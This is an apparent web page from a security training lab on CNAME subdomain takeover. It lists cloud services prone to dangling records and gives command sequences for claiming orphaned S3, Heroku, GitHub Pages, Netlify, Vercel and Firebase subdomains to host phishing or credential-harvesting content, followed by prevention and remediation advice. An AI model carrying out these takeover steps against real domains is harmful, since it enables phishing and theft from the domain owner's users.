Lab 2: CNAME Subdomain Takeover

CNAME subdomain takeover vulnerabilities

Difficulty: Medium

Lab Overview

This lab demonstrates CNAME subdomain takeover vulnerabilities where attackers can take control of subdomains that point to external services via CNAME records.

Objective: Understand how CNAME subdomain takeover attacks work and how to exploit them.

CNAME Takeover Scanner
Check CNAME Records

This tool checks if a subdomain's CNAME record is vulnerable to takeover:

CNAME Takeover Tester
⚠️ CNAME Takeover Warning

This lab demonstrates CNAME subdomain takeover vulnerabilities:

  • CNAME Misconfiguration - Pointing to non-existent services
  • Service Deletion - Services deleted but CNAME still points
  • Weak Authentication - Weak service authentication
  • No Validation - No CNAME validation
Vulnerable Services

Common vulnerable services:

  • *.s3.amazonaws.com - AWS S3 Buckets
  • *.herokuapp.com - Heroku Apps
  • *.github.io - GitHub Pages
  • *.netlify.app - Netlify Sites
Vulnerable Services
Common Vulnerable Services:
AWS S3 Bucket
*.s3.amazonaws.com
High Risk
Heroku App
*.herokuapp.com
High Risk
GitHub Pages
*.github.io
High Risk
Netlify Site
*.netlify.app
High Risk
Vercel Site
*.vercel.app
High Risk
Firebase Hosting
*.firebaseapp.com
High Risk
AWS CloudFront
*.cloudfront.net
High Risk
Fastly CDN
*.fastly.com
High Risk
Akamai CDN
*.akamai.net
High Risk
CNAME Subdomain Takeover Techniques
CNAME Enumeration
# Enumerate CNAME records dig subdomain.example.com CNAME nslookup -type=CNAME subdomain.example.com host -t CNAME subdomain.example.com
Service Detection
# Detect vulnerable services # Look for patterns like: # - *.s3.amazonaws.com # - *.herokuapp.com # - *.github.io # - *.netlify.app
Service Verification
# Verify service existence curl -I https://subdomain.example.com # Look for 404 errors or # "NoSuchBucket" errors
Service Registration
# Register vulnerable service # 1. Create account on service # 2. Register subdomain name # 3. Deploy malicious content # 4. Verify takeover
Content Deployment
# Deploy malicious content # - Phishing pages # - Malware distribution # - Credential harvesting # - XSS payloads
Impact Assessment
# Assess takeover impact # - Brand reputation damage # - Credential theft # - Phishing attacks # - SEO manipulation
Vulnerability Details
  • Type: CNAME Subdomain Takeover
  • Severity: Medium
  • Method: CNAME misconfiguration
  • Issue: Service deletion without CNAME cleanup
Attack Vectors
  • CNAME Enumeration: Find CNAME records
  • Service Detection: Detect vulnerable services
  • Service Verification: Verify service existence
  • Service Registration: Register vulnerable service
CNAME Subdomain Takeover Examples

Use these techniques to exploit CNAME subdomain takeover vulnerabilities:

1. CNAME Enumeration:
# Enumerate CNAME records dig subdomain.example.com CNAME nslookup -type=CNAME subdomain.example.com host -t CNAME subdomain.example.com # Use tools like: # - subjack # - takeover # - subzy # - subdomain-takeover
2. AWS S3 Bucket CNAME Takeover:
# Check S3 bucket CNAME dig subdomain.example.com CNAME # If CNAME points to *.s3.amazonaws.com # Check if bucket exists aws s3 ls s3://subdomain.example.com # If bucket doesn't exist: # 1. Create S3 bucket with same name # 2. Upload malicious content # 3. Verify takeover # Example: aws s3 mb s3://subdomain.example.com echo "Subdomain Takeover" > index.html aws s3 cp index.html s3://subdomain.example.com/ aws s3 website s3://subdomain.example.com --index-document index.html
3. Heroku App CNAME Takeover:
# Check Heroku app CNAME dig subdomain.example.com CNAME # If CNAME points to *.herokuapp.com # Check if app exists curl -I https://subdomain.example.com # If 404 error: # 1. Create Heroku app # 2. Deploy malicious content # 3. Verify takeover # Example: heroku create subdomain-example-com echo "Subdomain Takeover" > index.html git init git add . git commit -m "Initial commit" git push heroku main
4. GitHub Pages CNAME Takeover:
# Check GitHub Pages CNAME dig subdomain.example.com CNAME # If CNAME points to *.github.io # Check if site exists curl -I https://subdomain.example.com # If 404 error: # 1. Create GitHub repository # 2. Enable GitHub Pages # 3. Upload malicious content # 4. Verify takeover # Example: git init echo "Subdomain Takeover" > index.html git add . git commit -m "Initial commit" git push origin main # Enable GitHub Pages in repository settings
5. Netlify Site CNAME Takeover:
# Check Netlify site CNAME dig subdomain.example.com CNAME # If CNAME points to *.netlify.app # Check if site exists curl -I https://subdomain.example.com # If 404 error: # 1. Create Netlify site # 2. Upload malicious content # 3. Verify takeover # Example: # Upload files via Netlify dashboard # Or connect GitHub repository netlify deploy --dir . --prod
6. Vercel Site CNAME Takeover:
# Check Vercel site CNAME dig subdomain.example.com CNAME # If CNAME points to *.vercel.app # Check if site exists curl -I https://subdomain.example.com # If 404 error: # 1. Create Vercel project # 2. Deploy malicious content # 3. Verify takeover # Example: vercel --prod # Or connect GitHub repository
7. Firebase Hosting CNAME Takeover:
# Check Firebase site CNAME dig subdomain.example.com CNAME # If CNAME points to *.firebaseapp.com # Check if site exists curl -I https://subdomain.example.com # If 404 error: # 1. Create Firebase project # 2. Deploy malicious content # 3. Verify takeover # Example: firebase init hosting firebase deploy
8. AWS CloudFront CNAME Takeover:
# Check CloudFront CNAME dig subdomain.example.com CNAME # If CNAME points to *.cloudfront.net # Check if distribution exists curl -I https://subdomain.example.com # If 404 error: # 1. Create CloudFront distribution # 2. Configure origin # 3. Deploy malicious content # 4. Verify takeover # Example: aws cloudfront create-distribution --distribution-config file://config.json
9. Fastly CDN CNAME Takeover:
# Check Fastly CNAME dig subdomain.example.com CNAME # If CNAME points to *.fastly.com # Check if service exists curl -I https://subdomain.example.com # If 404 error: # 1. Create Fastly service # 2. Configure backend # 3. Deploy malicious content # 4. Verify takeover
10. Akamai CDN CNAME Takeover:
# Check Akamai CNAME dig subdomain.example.com CNAME # If CNAME points to *.akamai.net # Check if service exists curl -I https://subdomain.example.com # If 404 error: # 1. Create Akamai property # 2. Configure origin # 3. Deploy malicious content # 4. Verify takeover
11. Automated CNAME Takeover Detection:
# Use automated tools # - subjack # - takeover # - subzy # - subdomain-takeover # Example with subjack: subjack -w subdomains.txt -t 100 -o results.txt # Example with takeover: takeover -l subdomains.txt -t 10 # Example with subzy: subzy run --targets subdomains.txt
12. Manual CNAME Verification:
# Manual verification steps # 1. Check CNAME records # 2. Verify service existence # 3. Test for 404 errors # 4. Attempt service registration # 5. Confirm takeover # 6. Document findings # Example verification: dig subdomain.example.com CNAME curl -I https://subdomain.example.com # Check response for 404 or service errors
13. CNAME Takeover Prevention:
# Prevent CNAME takeovers # 1. Regular DNS auditing # 2. Service monitoring # 3. Proper cleanup procedures # 4. DNS security controls # 5. Subdomain monitoring # Example monitoring: # - Set up DNS monitoring # - Monitor for CNAME changes # - Alert on service deletions # - Regular security scans
14. CNAME Takeover Impact:
# Assess takeover impact # - Brand reputation damage # - Credential theft potential # - Phishing attack vectors # - SEO manipulation # - Trust and security implications # Document findings: # - Vulnerable CNAME records # - Affected services # - Potential impact # - Remediation steps
15. CNAME Takeover Remediation:
# Remediate CNAME takeovers # 1. Remove vulnerable CNAME records # 2. Point to secure services # 3. Implement proper monitoring # 4. Regular security audits # 5. DNS security controls # Example remediation: # - Delete vulnerable CNAME # - Point to secure A record # - Set up monitoring # - Regular security scans
Real-World Attack Scenarios
Mitigation Strategies
  • Regular CNAME record auditing and cleanup
  • Implement proper subdomain monitoring
  • Use secure service configurations
  • Implement proper authentication and authorization
  • Regular security testing and vulnerability assessments
  • Monitor for unusual subdomain activity
  • Implement proper DNS security controls
  • Use secure coding practices
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use CNAME takeover detection tools
  • Implement proper audit trails